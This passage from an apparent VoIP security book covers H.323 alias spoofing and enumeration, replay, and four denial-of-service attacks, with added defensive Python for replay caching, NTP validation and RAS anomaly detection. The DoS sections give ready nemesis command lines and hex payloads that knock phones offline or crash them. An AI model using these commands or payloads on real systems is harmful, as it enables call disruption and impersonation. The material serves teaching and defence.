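    """Stand-in for the ASN.1 encoding of one token field (assumption: the
    real PER encoding is not reproduced here): 2-byte big-endian length + bytes."""
    return struct.pack(">H", len(value)) + value

def crypto_ep_pwd_hash(h323_id: str, password: str, timestamp: int) -> str:
    """MD5 over the individually encoded H.323-ID, password and NTP timestamp,
    i.e. the cryptoEPPwdHash of Figure 3-2 (hex, lower case)."""
    buf = (encode_field(h323_id.encode("utf-16-be"))  # H.323-ID is a BMPString
           + encode_field(password.encode("utf-8"))
           + encode_field(struct.pack(">I", timestamp)))
    return hashlib.md5(buf).hexdigest()

class Gatekeeper:
    """Minimal model of the authenticator side of an H.225 RAS registration."""

    def __init__(self, credentials: Dict[str, str], window_seconds: int,
                 replay_cache: bool = False) -> None:
        self.credentials = credentials    # H.323-ID -> shared password
        self.window = window_seconds      # tolerated clock skew (30-60 min in practice)
        self.replay_cache = replay_cache  # hardening: refuse a token seen before
        self.seen: Set[Tuple[str, int, str]] = set()

    def register(self, h323_id: str, timestamp: int, received_hash: str,
                 now: int) -> Tuple[bool, str]:
        """Step 5 of the process: recompute the hash with the stored password and
        the endpoint's own timestamp, then compare in constant time."""
        password = self.credentials.get(h323_id)
        if password is None:
            return False, "unknown H.323-ID"
        if abs(now - timestamp) > self.window:
            return False, "timestamp outside acceptance window"
        expected = crypto_ep_pwd_hash(h323_id, password, timestamp)
        if not hmac.compare_digest(expected, received_hash.lower()):
            return False, "hash mismatch (wrong password)"
        token = (h323_id, timestamp, received_hash.lower())
        if self.replay_cache:
            # Within the window the same token is otherwise valid any number of
            # times; remembering it closes the replay described above.
            if token in self.seen:
                return False, "replayed token"
            self.seen.add(token)
        return True, "registered"

# Constructed scenario reusing the page's USER / PASS / 1162895565 values.
T0 = 1162895565

def replay_scenario(use_cache: bool) -> List[Tuple[bool, str]]:
    """Endpoint registers at T0; the captured token is replayed 10 minutes
    later and once more after the 30-minute window has closed."""
    gk = Gatekeeper({"USER": "PASS"}, window_seconds=30 * 60, replay_cache=use_cache)
    token = crypto_ep_pwd_hash("USER", "PASS", T0)      # what the endpoint sent
    return [
        gk.register("USER", T0, token, now=T0),          # legitimate endpoint
        gk.register("USER", T0, token, now=T0 + 600),    # replay inside the window
        gk.register("USER", T0, token, now=T0 + 3600),   # replay after the window
    ]

if __name__ == "__main__":
    for label, cache in (("window only", False), ("window + replay cache", True)):
        print(label, replay_scenario(cache))
```

With the window alone the second registration succeeds, which is the replay; with the cache it is refused while the legitimate first registration is unaffected.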
H.323EndpointSpoofing(E.164Alias)
At a high level, an E.164 alias is the phone number plan used for addresses and phone number aliases for H.323 endpoints. It is also often used as an identifier for H.323 endpoints on the network. Because the E.164 alias is spoofable, any gatekeeper that uses it as a trusted value can be subverted. Generally, any item that is trusted as an identification entity and is also spoofable becomes a big security problem for the enterprise. E.164 alias spoofing is similar to other attacks on trusted entities, like MAC addresses on Ethernet cards, Initiator Node Names on iSCSI endpoints, and WWNs on Fibre Channel HBAs. If MAC address filtering is being used on a wireless access point, any attacker can change her MAC address using etherchange from http://www.ntsecurity.nu/ and bypass the access controls. The same idea holds true for an E.164 alias. A malicious endpoint can change its E.164 alias and register to the gatekeeper with a spoofed identity.
Depending on the gatekeeper's policy, the attacker may or may not need to perform a DoS attack against the entity being impersonated beforehand (described later in this chapter) to complete the attack. If the gatekeeper's policy is set to overwrite, every new endpoint with an E.164 alias already in the gatekeeper's database (duplicate alias) will be allowed to overwrite the existing registration; hence, no DoS attack is needed. If the policy is set to reject, any new endpoint with a duplicate E.164 alias will be rejected and thus not allowed to join the network. In order to join the network with the spoofed alias, the attacker will need to perform a DoS attack on the legitimate endpoint in order to force it into an un-registered state with the network. Once a Denial of Service attack is performed on the legitimate endpoint and it is forced off the VoIP network, the attacker can slip right in with his spoofed alias. Furthermore, when the real endpoint attempts to re-register on the network, it will probably be rejected because there is already an endpoint with its E.164 alias (the attacker's endpoint that slipped in). Various policies will affect the outcome for this attack class.
Before the attacker spoofs and registers another identity on the VoIP network, he needs to find the E.164 alias, as demonstrated in the following section. Additionally, because the E.164 alias is the value used to contact another person, it is publicized heavily in VoIP environments (similar to a phone number in a phone book). The company directory will have a user's full name and his or her E.164 alias (often VoIP company directories are fully available with no authentication). This information can be used by the attacker to spoof practically any user on the VoIP network.
Note✎
One example attack that is fairly severe would be to appear as a company executive, like the CEO or CFO, and receive or make phone calls as that person. If there is a conference call with the Securities and Exchange Commission (SEC), the attacker will be recognized as the CEO/CFO and can record audio clips of the conversation (as described in Chapter 4).
In order to spoof your E.164 alias, complete the following simple steps. In this example, we will be using the PowerPlay H.323 endpoint.
1. Select Start ► Programs ► PowerPlay ► PowerPlay Control Panel.
2. Select the Gatekeeper tab.
3. Note the text box at the bottom of the screen displaying the current E.164 alias. Change the current value to the new value you wish to spoof, as shown in Figure 3-8. (This can be any value from the VoIP company directory, such as the alias of the CEO of the company.) We'll use 37331.
Figure 3-8. Spoofing E.164 alias
4. Click OK and you're done! The E.164 alias has been spoofed and is now recognized as a new identity on the VoIP network. All calls directed to 37331 will now be redirected to the attacker's endpoint.
Note✎
An attacker who wishes to spoof an alias that already belongs to another endpoint will have to perform a Denial of Service attack before step 3 on the real H.323 endpoint before changing her E.164 alias.
E.164 Alias Enumeration
There are a few ways to enumerate an E.164 alias, which is needed to spoof an H.323 endpoint (as shown in the previous example). The easiest method is simply to sniff the information over the network. During a call, one endpoint will call another endpoint using its E.164 alias. The destination endpoint's information moves across the network in cleartext; thus, an attacker can simply sniff the connection and view the destination E.164 alias. If an attacker is sniffing the network using Wireshark, the location of the E.164 alias is located on the dialedDigits line. The dialedDigits line shows the destination E.164 alias used for the voice connection. The path to find the dialedDigits line on an H.323 packet using Wireshark is shown below:
H.225.0 RAS
  gatekeeperRequest
    endpointAlias
      Item 1
        Item: dialedDigits
          dialedDigits
It may not be possible to simply perform a man-in-the-middle attack to sniff the network, thereby forcing the attacker to find a better way to enumerate E.164 information. The next method, which is the better choice when sniffing is not possible, is to brute-force the information from a gatekeeper. When an endpoint attempts to register with a gatekeeper using an unauthorized E.164 alias, the gatekeeper sends a Security Denial Message, specifically: securityDenial (11). However, if an endpoint attempts to register with an E.164 alias that has already been registered, the gatekeeper will send a duplicate error message, specifically: duplicateAlias. A duplicate error signals that the attempted E.164 information is legitimate and registered to the gatekeeper but used by a different H.323 endpoint. This behavior allows an attacker to enumerate E.164 information from the gatekeeper. Because an attacker will be told when he has the incorrect E.164 alias (securityDenial) or correct but already used E.164 alias (duplicateAlias), he can send several million packets to the gatekeeper with a different E.164 alias (1 to 999999999) until he gets a list of duplicateAlias messages from the gatekeeper. This list will then give the attacker a list of valid E.164 numbers, allowing him to enumerate possible entities to spoof. To automate this attack, an attacker can simply write a script to send millions of registration request packets to the gatekeeper, each with a unique E.164 alias. Once the attacker receives a duplicateAlias error message from the gatekeeper, he will have enumerated a valid E.164 alias. For example, Figures 3-9 and 3-10 show the enumeration process. Line 2 (rejectReason) in Figure 3-9 shows an error message when an attacker attempts to register with an E.164 alias that is not authorized (securityDenial). Line 2 in Figure 3-10 shows an error message (rejectReason) when an attacker attempts to register with an authorized E.164 alias that has already been registered (duplicateAlias). The difference in the error messages tells the attacker that his second attempt was using a valid E.164 alias name.
Figure 3-9. Security denial error when trying to register with an unauthorized E.164 alias
Figure 3-10. Enumerating E.164 alias by the duplicateAlias error message
E.164 Hopping Attacks
Hopping attacks allow unauthorized users to jump across security groupings, allowing them to escape any kind of isolation that was put in place. For example, hopping attacks allow unauthorized users to access authorized areas. Furthermore, the attacks allow unprivileged users to access areas where only privileged users should be. Previous hopping attacks are best known from Cisco switches. Attackers were able to hop across VLANs using specific VLAN tags and gain access to certain networks that should have otherwise been limited. An E.164 hopping attack is an extension of the spoofing attacks described previously. Often, gatekeepers will use E.164 aliases as security entities (allowing only a static set of E.164 aliases to register to gatekeepers or make specific types of calls). Hence, E.164 aliases are set up with different zones for H.323 endpoints. For example, one group of aliases might be allowed to call anywhere, including international locations at the most expensive time of day; another group might be restricted to calling only domestic long distance numbers; another group might be allowed to call internal numbers only; and a final group might be allowed to call only "900" numbers. As of this writing, many controls for outbound dialing are not used, as every number can call anywhere; however, this trend will probably change. For example, in today's mobile environment, many company conversations that discuss sensitive information occur via the phone. The assumption is that everyone with access to the number should be on the call; however, conference bridge numbers are forwarded to the wrong place more often than people think. The pre-texting and information leakage issues at Hewlett-Packard, motivating the company to break the law in 2006 (although with virtually no consequences), led to the need for stronger security for sensitive conference calls (http://en.wikipedia.org/wiki/2006_HP_spying_scandal/). For example, conference calls discussing a company's goals will need a method to ensure that only internal phone numbers can join the call. If the technique used to identify authorized phones is the E.164 alias, the alias can be spoofed. Any controls set up by the gatekeeper/gateway for dialing restrictions can simply be overridden by an attacker.
Spoofing the E.164 alias breaks the entire model for identity assurance on the H.323 VoIP network. Furthermore, as an end user, calling the CEO, CFO, or simply your co-worker on another floor may result in your speaking to an attacker who has hijacked an identity.
Denial of Service via NTP
Now that we know why authentication (registration) and authorization cannot be trusted with H.323, let's shift focus to the Denial of Service attacks on H.323 environments.
DoS with Authentication Enabled
The first DoS we will discuss occurs when authentication is enabled for H.323 endpoints. As discussed previously, H.323 authentication uses a timestamp from an NTP server (and a few other items) to create the MD5 hash. However, an attacker can ensure that H.323 endpoints cannot register to the network by updating H.323 devices with incorrect timestamp information. This is possible because NTP uses UDP for transport, which is connectionless and unreliable (hence, any attacker can forge an NTP packet). For example, an attacker could use a rogue NTP server and send timestamps to H.323 endpoints that are not the same timestamps used by the gatekeeper. Furthermore, the attacker could send timestamps to the gatekeeper that differ from the ones used by all the endpoints. Because most H.323 endpoints and gatekeepers do not require authentication for timestamp updates, they will simply accept the timestamps received from the attacker. At best, some endpoints and gatekeepers will accept timestamp information only from certain IP addresses; however, attackers can simply spoof their IP addresses and then send the malicious timestamp information to the endpoint. Hence, with incorrect timestamp information, the MD5 hash values between gatekeepers and H.323 endpoints will not match, preventing VoIP phones from authenticating.
Note✎
A powerful attack would not need to target every H.323 endpoint on the network, but only the four or five gatekeepers. Once the gatekeepers are updated with incorrect timestamp information, the gatekeeper will un-register or refuse to authenticate every H.323 endpoint on the network, bringing the whole VoIP network to its knees.
Use the following steps to execute a DoS attack on H.323 endpoints with authentication enabled.
1. Let's use Nemesis for packet generation, which can be found at http://www.packetfactory.net/projects/nemesis/ or the bootable BackTrack Live CD (http://www.remote-exploit.org/index.php/BackTrack/).
2. Start Nemesis from the BackTrack Live CD.
3. Download iSEC.NTP.DOS from http://www.isecpartners.com/tools.html/; this is the input file we'll use with Nemesis in order to execute the NTP DoS attack.
4. Execute the following command in step b. The test lab information being used is shown in step a, which should be changed to match the IP addresses of your lab:
a. Network information
i. Attacker's IP: 172.16.1.103
ii. Attacker's MAC: 00:05:4E:4A:E0:E1
iii. Target's IP (H.323 gatekeeper): 172.16.1.140
iv. Target's MAC (H.323 gatekeeper): 02:34:4F:3B:A0:D3
b. Example syntax: nemesis udp -x 123 -y 123 -S 172.16.1.103 -D 172.16.1.140 -H 00:05:4E:4A:E0:E1 -M 02:34:4F:3B:A0:D3 -P iSEC.NTP.DOS
5. Repeat step b repeatedly as long as you want the DoS attack to occur (or create a script to repeat it indefinitely).
6. The following hex information shows the example packet with an NTP timestamp update of November 7, 2006. (The actual value of the timestamp is unimportant; it simply needs to be within approximately 1,000 seconds of the correct time.) Be sure to use a hex editor if you wish to modify the file to be used with Nemesis:
dc000afa00000000000102900000000000000000000000000000000000000000c8fb4fb9b6c2699cc8fb4fb9b6c2699c
Done! You have now updated the H.323 gatekeeper with the incorrect timestamp information. All H.323 clients attempting to authenticate will be rejected and, hence, prevented from making any telephone calls.
Denial of Service via UDP (H.225 Registration Reject)
The next Denial of Service attack involves H.225 Registration Reject packets. As the name suggests, a Registration Reject is used to reject registration of or un-register an existing H.323 endpoint. The security issue is that no authentication is required to forcibly reject H.323 endpoints off the network. Hence, if an H.323 endpoint is legitimately authenticated to a gatekeeper, an attacker can simply send the endpoint one UDP Registration Reject packet and the endpoint will immediately be un-registered. The legitimate endpoint will then attempt to re-register, but the attacker can simply send another UDP packet and immediately un-register it. Because the attack involves only one UDP packet, the attacker can send registration reject packets once every few minutes to prevent the legitimate H.323 endpoint from registering to the gatekeeper (preventing the endpoint from sending or receiving telephone calls indefinitely). Complete the following steps to execute a DoS attack using Registration Reject packets.
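The NTP update shown above, decoded and run through the checks an endpoint or gatekeeper could apply before trusting a time source; this is an added example, not code from the book or the iSEC tools, and the "local clock" value and the allow-listed server address it uses are constructed.

```python
"""Validate an NTP reply before letting it change an H.323 device's clock.

Added example; it is not code from the book or the iSEC tools.  The packet
bytes are the example NTP update printed above; the "now" value used in the
demo and the allowed-server address are constructed.  A device that ran
checks like these would not accept an unauthenticated update from an
arbitrary source, which is the weakness this section describes.
"""
import struct
from typing import Optional, Set

NTP_UNIX_DELTA = 2_208_988_800   # seconds from the NTP epoch (1900) to the Unix epoch (1970)
MAX_OFFSET_SECONDS = 1000.0      # the text notes ~1,000 s of skew is enough to break H.235 auth

# Hex dump of the NTP packet from the text (48-byte NTPv3 packet, server mode).
PAGE_NTP_HEX = (
    "dc000afa00000000000102900000000000000000000000000000000000000000"
    "c8fb4fb9b6c2699cc8fb4fb9b6c2699c"
)
PAGE_NTP_PACKET = bytes.fromhex(PAGE_NTP_HEX)


def ntp_to_unix(ts64: int) -> float:
    """Convert a 64-bit NTP timestamp (32-bit seconds, 32-bit fraction) to Unix time."""
    return (ts64 >> 32) - NTP_UNIX_DELTA + (ts64 & 0xFFFFFFFF) / 2 ** 32


def parse_ntp(packet: bytes) -> dict:
    """Decode the fixed 48-byte NTP header (leap/version/mode byte, stratum, timestamps)."""
    if len(packet) < 48:
        raise ValueError("NTP packet shorter than 48 bytes")
    (flags, stratum, poll, precision, root_delay, root_disp, ref_id,
     ref_ts, orig_ts, recv_ts, xmit_ts) = struct.unpack("!BBbbIIIQQQQ", packet[:48])
    return {
        "leap": flags >> 6,            # 3 = alarm condition, clock not synchronised
        "version": (flags >> 3) & 0x7,
        "mode": flags & 0x7,           # 4 = server reply
        "stratum": stratum,            # 0 = unspecified / kiss-o'-death, never a usable source
        "poll": poll,
        "precision": precision,
        "ref_id": ref_id,
        "recv_time": ntp_to_unix(recv_ts),
        "xmit_time": ntp_to_unix(xmit_ts),
    }


def validate_ntp_reply(packet: bytes, now_unix: float, src_ip: Optional[str] = None,
                       allowed_servers: Optional[Set[str]] = None) -> list:
    """Return the reasons this reply must not be applied; an empty list means accept.

    Source allow-listing (and, in a real deployment, NTP authentication) covers
    the "anyone can forge an NTP packet" problem; the header and plausibility
    checks cover a rogue server that is reachable from an allowed address.
    """
    problems = []
    if allowed_servers is not None and src_ip not in allowed_servers:
        problems.append(f"source {src_ip} is not a configured NTP server")
    hdr = parse_ntp(packet)
    if hdr["mode"] != 4:
        problems.append(f"mode {hdr['mode']} is not a server reply")
    if hdr["leap"] == 3:
        problems.append("leap indicator 3: server reports its clock is unsynchronised")
    if hdr["stratum"] == 0:
        problems.append("stratum 0: unspecified source, reply must be discarded")
    offset = hdr["xmit_time"] - now_unix
    if abs(offset) > MAX_OFFSET_SECONDS:
        problems.append(f"transmit time is {offset:+.0f} s from the local clock")
    return problems


if __name__ == "__main__":
    hdr = parse_ntp(PAGE_NTP_PACKET)
    print(f"stratum={hdr['stratum']} leap={hdr['leap']} mode={hdr['mode']} "
          f"xmit_unix={hdr['xmit_time']:.0f}")
    # Constructed "now": the packet's own transmit time, i.e. the local clock is already right.
    # 172.16.1.103 is the attacker address from the lab setup; 172.16.1.2 is a constructed NTP server.
    for p in validate_ntp_reply(PAGE_NTP_PACKET, now_unix=1162924345.0,
                                src_ip="172.16.1.103", allowed_servers={"172.16.1.2"}):
        print("reject:", p)
```

Even with the local clock already correct, the packet from the text fails the header checks (stratum 0, leap indicator 3), so a validating device would have discarded it before the source question arose.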
1. Start Nemesis from the BackTrack Live CD.
2. Download iSEC.Registration.Reject.DOS from http://www.isecpartners.com/tools.html/ and use it as the input file with Nemesis in order to execute the Registration Reject DoS.
3. Once the file has been downloaded, execute the command in step b. Again, the test lab information being used is shown in step a; it should be changed to match the IP addresses of your lab:
a. Network information
i. Attacker's IP: 172.16.1.103
ii. Attacker's MAC: 00:05:4E:4A:E0:E1
iii. Target's IP (H.323 endpoint): 172.16.1.140
iv. Target's MAC (H.323 endpoint): 02:34:4F:3B:A0:D3
b. Example syntax: nemesis udp -x 1719 -y 1719 -S 172.16.1.103 -D 172.16.1.140 -H 00:05:4E:4A:E0:E1 -M 02:34:4F:3B:A0:D3 -P iSEC.Registration.Reject.DOS
The following shows the hex information from the provided Registration Reject packet. (Use a hex editor if you wish to modify the file to be used with Nemesis.)
1400099a060008914a000583010000000000
Done! With a single UDP packet, you have un-registered the H.323 client.
Note✎
In order to perform this attack on all H.323 clients, simply send one UDP packet to each IP address on the network. To prolong the DoS attack, simply send the one UDP packet repeatedly, which will prevent all H.323 clients from re-registering.
Denial of Service via Host Unreachable Packets
The next Denial of Service attack involves an existing phone call between two H.323 endpoints. When two H.323 endpoints establish a phone call, many packets fly across the network. One of the many packets is used to ensure that the two endpoints are still there. For example, when talking on your cell phone, you probably say "Hello" when you encounter silence on the other end to make sure that you have not been disconnected. In many situations, the person may still be on the line but silent, which makes you wonder if the call has been cut off. The same idea applies to VoIP; packets are sent to ensure that the call is still connected. In this DoS attack, an attacker can repeatedly spoof an ICMP Host Unreachable packet from one endpoint to another. In certain vendor implementations, the receiver of the ICMP Host Unreachable packet will think the other side has disconnected and will terminate the call.
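One way to detect both the alias enumeration described in the E.164 Alias Enumeration section and the single-packet Registration Reject un-register described here, from a stream of H.225 RAS events; this is an added example, not code from the book or the iSEC tools, and the events it analyzes are constructed (172.16.1.140 is the lab gatekeeper address from the text).

```python
"""Flag E.164 alias enumeration and forged RegistrationReject traffic in H.225 RAS.

Added example; not code from the book or the iSEC tools.  It consumes a list
of RAS events as a probe on the gatekeeper segment (or the gatekeeper's own
log) could emit them, and applies two checks from this chapter: an endpoint
that cycles through aliases and is answered with securityDenial /
duplicateAlias is enumerating the directory, and a RegistrationReject that
does not come from the gatekeeper, or answers no outstanding request, is the
single-packet un-register.  All events are constructed; 172.16.1.140 is the
lab gatekeeper address from the text.
"""
from collections import defaultdict
from dataclasses import dataclass

GATEKEEPER_IP = "172.16.1.140"
ENUM_THRESHOLD = 5        # distinct rejected aliases from one endpoint before alerting
ENUM_WINDOW = 60.0        # seconds


@dataclass
class RasEvent:
    ts: float          # capture time, seconds
    src: str           # source IP
    dst: str           # destination IP
    msg: str           # "RRQ" registrationRequest, "RCF" registrationConfirm, "RRJ" registrationReject
    alias: str = ""    # E.164 alias carried in an RRQ
    reason: str = ""   # rejectReason carried in an RRJ


def analyze_ras(events, gatekeeper=GATEKEEPER_IP, threshold=ENUM_THRESHOLD, window=ENUM_WINDOW):
    """Return {"spoofed_rrj": [...], "unsolicited_rrj": [...], "enumeration": {ip: {...}}}."""
    pending = {}                    # endpoint IP -> alias of its outstanding RRQ
    rejected = defaultdict(list)    # endpoint IP -> [(ts, alias, reason)]
    result = {"spoofed_rrj": [], "unsolicited_rrj": [], "enumeration": {}}

    for ev in sorted(events, key=lambda e: e.ts):
        if ev.msg == "RRQ":
            pending[ev.src] = ev.alias
        elif ev.msg == "RCF":
            pending.pop(ev.dst, None)          # registration succeeded, nothing outstanding
        elif ev.msg == "RRJ":
            if ev.src != gatekeeper:
                # Only the gatekeeper may reject; anything else is a forged un-register.
                result["spoofed_rrj"].append((ev.ts, ev.src, ev.dst))
                continue
            if ev.dst not in pending:
                # Genuine gatekeeper address but no RRQ to answer: unsolicited reject.
                result["unsolicited_rrj"].append((ev.ts, ev.dst))
                continue
            alias = pending.pop(ev.dst)
            if ev.reason in ("securityDenial", "duplicateAlias"):
                rejected[ev.dst].append((ev.ts, alias, ev.reason))

    for ip, hits in rejected.items():
        latest = hits[-1][0]
        recent = [h for h in hits if h[0] >= latest - window]
        distinct = {alias for _, alias, _ in recent}
        if len(distinct) >= threshold:
            # duplicateAlias answers are the valid aliases the probing endpoint learned.
            leaked = sorted({alias for _, alias, reason in recent if reason == "duplicateAlias"})
            result["enumeration"][ip] = {"attempts": len(distinct), "leaked": leaked}
    return result


def sample_events():
    """Constructed capture: a probing endpoint, a legitimate registration, two forged rejects."""
    probe, victim, gk = "172.16.1.103", "172.16.1.119", GATEKEEPER_IP
    events, t = [], 0.0
    for alias in ("1001", "1002", "1003", "1004", "1005", "37331"):
        reason = "duplicateAlias" if alias in ("1003", "37331") else "securityDenial"
        events.append(RasEvent(t, probe, gk, "RRQ", alias=alias))
        events.append(RasEvent(t + 0.1, gk, probe, "RRJ", reason=reason))
        t += 1.0
    events.append(RasEvent(10.0, victim, gk, "RRQ", alias="37331"))
    events.append(RasEvent(10.1, gk, victim, "RCF"))
    events.append(RasEvent(20.0, probe, victim, "RRJ", reason="undefinedReason"))   # wrong source
    events.append(RasEvent(30.0, gk, victim, "RRJ", reason="undefinedReason"))      # no RRQ pending
    return events


if __name__ == "__main__":
    for key, value in analyze_ras(sample_events()).items():
        print(key, value)
```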
Note✎
A few H.323 hard phones have been tested and found vulnerable to this attack. All vendors have been notified, and this vulnerability has been fixed.
The following steps can be used to execute a DoS attack using ICMP Host Unreachable packets during an existing call.
1. Start Nemesis from the BackTrack Live CD.
2. Download iSEC.ICMP.Host.Unreachable.DOS from http://www.isecpartners.com/tools.html/. We'll use this as the input file with Nemesis in order to execute the ICMP Host Unreachable DoS.
3. Execute the command in step b. The test lab information being used is shown in step a; it should be changed to match the IP addresses of your lab:
a. Network information
i. Attacker's IP: 172.16.1.103
ii. Attacker's MAC: 00:05:4E:4A:E0:E1
iii. Target's IP (H.323 endpoint): 172.16.1.140
iv. Target's MAC (H.323 endpoint): 02:34:4F:3B:A0:D3
b. Example syntax: nemesis icmp -S 172.16.1.103 -D 172.16.1.140 -H 00:05:4E:4A:E0:E1 -M 02:34:4F:3B:A0:D3 -i 03 -c 01 -P iSEC.ICMP.Host.Unreachable.DOS
4. Issue the command repeatedly or create a script to repeat the command indefinitely.
The following hex information shows the example packet with a Registration Reject packet. (Use a hex editor if you wish to modify this file for use with Nemesis.)
303035303630303132613139303035303630303165653932303830303435303030303163313233343430303066663031666666326330613837343439633061383734316630333031666366653030303030303030
Done! You have now forcibly terminated an existing call between two H.323 clients.
Denial of Service via H.225 nonStandardMessage
Our final Denial of Service attack occurs via the H.225 nonStandardMessage packet. As the name suggests, a nonstandard H.225 packet is sent from an endpoint to a target that cannot interpret it correctly. Nonstandard messages are often used to perform vendor-specific actions. In cases where the packets are misused, the misuse may cause a VoIP device to crash. As with the previous attack, an attacker can repeatedly send this packet to an H.323 endpoint on the network. Depending on vendor implementations, the packet will overload and crash the system. This crash, in turn, opens up the endpoint to many of the attacks discussed earlier in this chapter (such as the replay attack or endpoint spoofing) because it takes a legitimate endpoint off the network for two or three minutes.
Note✎
A few H.323 hard phones have been tested and found vulnerable to this attack. All vendors have been notified, and this vulnerability has been fixed.
The following steps can be used to execute this DoS attack, which causes the remote endpoint to crash, using the H.225 nonStandardMessage.
1. Start Nemesis from the BackTrack Live CD.
2. Download iSEC.nonStandardMessage.DOS from http://www.isecpartners.com/tools.html/; this will be the input file to be used with Nemesis in order to execute the nonStandardMessage DoS attack.
3. Once the file has been downloaded, execute the command in step b with the lab information in step a:
a. Network information
i. Attacker's IP: 172.16.1.103
ii. Attacker's MAC: 00:05:4E:4A:E0:E1
iii. Target's IP (H.323 endpoint): 172.16.1.140
iv. Target's MAC (H.323 endpoint): 02:34:4F:3B:A0:D3
b. Example syntax: nemesis udp -x 1719 -y 1719 -S 172.16.1.103 -D 172.16.1.140 -H 00:05:4E:4A:E0:E1 -M 02:34:4F:3B:A0:D3 -P iSEC.nonStandardMessage.DOS
4. Issue the command repeatedly or create a script to repeat it indefinitely.
The following shows the hex information from the example packet with a Registration Reject packet. (Use a hex editor if you wish to modify the file to be used with Nemesis.)
5c0981408201010004030000040400000000
Done! You have now crashed the H.323 client.
Summary
H.323 is a popular signaling protocol used in VoIP infrastructures, especially in enterprise networks with existing PBX systems. H.323 includes several subprotocols, such as H.235 and H.225; however, the security model of H.323 and its subprotocols is quite weak. Authentication and registration methods used within H.225 are vulnerable to several attacks, including passive dictionary attacks and replay attacks. As we have seen, the authentication model used in H.323 allows attackers to retrieve an endpoint's password quite easily. Furthermore, the authorization methods used with H.323 rely on E.164 aliases, which can be spoofed by an attacker. The identity of any H.323 endpoint cannot be trusted because attackers can perform simple attacks to impersonate others. Finally, the reliability of the H.323 network leaves much to be desired. This chapter has discussed only four Denial of Service attacks against H.323 endpoints/gatekeepers; however, there are probably a lot more. Voice communication, including 911 calls, requires a high level of reliability/availability. Unfortunately, many H.323 entities, including hard phones and soft phones and gatekeepers/session border controllers, are quite easy to take offline, cut off, or simply ensure that no communication takes place. When building a VoIP network using H.323, it is important to know about the major problems with authentication, authorization, and reliability/availability. This chapter has focused on the flaws with H.323 in order for users to understand the risks. Chapter 9 will discuss the defenses for VoIP communication, including possible defenses against H.323 attacks.
Chapter 4. MEDIA: RTP SECURITY
Real-time Transport Protocol (RTP) is the major multimedia transport method for SIP and H.323. Real Time Control Protocol (RTCP) is often used with RTP as the complementary protocol that sends nondata information, such as control information, to endpoints. RTCP is primarily used for QoS (Quality of Service) information, such as packets sent, packets received, and jitter. (Jitter is the variation in the delay of received packets in a VoIP packet flow.) Both protocols are often used together for the media layer of VoIP networks (mostly RTP with some supporting RTCP packets). While VoIP calls are set up using H.323 or SIP, the voice communication (audio) between two endpoints will use RTP. Figure 4-1 shows an example of the architecture.
Figure 4-1. RTP for media content
You should understand right away that RTP uses cleartext transmission, so it lacks confidentiality, integrity, and authentication. Users who have access to the network via a shared medium or even via the use of an ARP poisoning attack (discussed in Chapter 2) can sniff RTP packets, reassemble them, and then listen to the voice communication using a common media player, such as Windows Media Player. While the security issues around RTP have been known for some time, the issues have only recently come to the surface, as security tools, such as Wireshark and Cain & Abel, have made the attack process quite easy.
Note✎
One might argue that other protocols, including HTTP, FTP, telnet, TFTP, POP3, and SMTP, also transmit in cleartext with little security protections; however, most phone users assume a certain level of privacy, integrity, and reliability with their conversations. Users of many system-level protocols do not always make these assumptions.
This chapter discusses RTP security as it pertains to VoIP, including specific vulnerabilities like eavesdropping, voice injection, and Denial of Service.
RTP Basics
RTP is a UDP protocol that can be used dynamically on ports 1024 to 65535. Although RTP can be used on any UDP port greater than 1024, many VoIP enterprise solutions, such as those offered by Cisco and Avaya, can be configured to use static ports for RTP packets. In addition, major softphones tend to use specific ranges for RTP/RTCP connections rather than randomly pick ports across connections. The basic elements of an RTP packet are no different from those associated with any other protocol. RTP packets include a sequence number, timestamp, payload (data), SSRC (synchronization source), and CSRC (contributing source), as shown in the following list.
Sequence number: This is the value that maintains state between VoIP endpoints. The sequence number increases by one for each RTP packet sent by one endpoint.
Timestamp: The timestamp holds the time information for the RTP connection. It should be noted that the timestamp is an indication of the sampling period of the audio payload in the packet, which is typically incremented by 160 in each packet.
Synchronization source: This is the source for packet synchronization during an RTP stream.
Contributing source: This is a contribution to the synchronization source during an RTP stream.
Note✎
To learn more about the RTP protocol and how it works, refer to the RFC located at http://www.faqs.org/rfcs/rfc1889.html/.
Section B of the RTP RFC, "Security Considerations," lists the many security concerns associated with the protocol. For example, it describes how users may assume more privacy from voice (phone) communication than from data (e.g., email) transmission, because of what they expect from phone conversation over wired telephone lines. The first sentence in Section 9 of the RFC also states that security is expected to be addressed at lower levels, such as IPSec. However, most VoIP implementations will not use IPSec at lower levels to protect call privacy. Furthermore, the use of lower-level encryption protocols may drastically reduce the performance of VoIP communication, causing the audio quality to degrade. These facts, as well as many others written in the RFC, hint at the security issues associated with the RTP protocol.
RTP Security Attacks
Security attacks on VoIP are usually focused on capturing media (audio), which involves RTP. The lack of encryption and/or privacy allows several types of attacks from unauthorized users, including anonymous, unauthenticated users.
Note✎
While Secure RTP (SRTP), described in Chapter 9, does provide security for media communication, most enterprise organizations have not implemented SRTP because of performance and/or operational issues.
RTP is vulnerable to many types of attacks, including traditional ones, such as spoofing, hijacking, Denial of Service, and traffic manipulation, as well as newer ones, such as eavesdropping and voice injection. In the following sections, we'll focus on the most dangerous and severe attacks on RTP, including:
Passive eavesdropping
Active eavesdropping
Denial of Service
Passive Eavesdropping
RTP's cleartext packets can be sniffed over the network just as with telnet, FTP, and HTTP. However, unlike such an attack on telnet, simply capturing a few RTP packets over the network will not provide an attacker with all the sensitive information he or she wants. This is because RTP transfers streams of audio packets, meaning that an attacker must capture an entire stream in order to capture a conversation. Capturing just a single RTP packet would be like capturing the letter S from this sentence—you'd have only a single letter and none of the real information. While this makes RTP eavesdropping a bit tougher than intercepting simpler traffic, the ability to capture RTP audio streams is still very possible. Tools like Cain & Abel and Wireshark make capturing RTP streams over the network almost easy. These tools capture a sequence of RTP packets, reassemble them in the correct order, and save the RTP stream as an audio file (e.g., .wav) using the correct audio codec. This allows any passive attacker to simply point, click, and eavesdrop on almost any VoIP communication within his or her own subnet.
Capturing Packets from Different Endpoints: Man-in-the-Middle
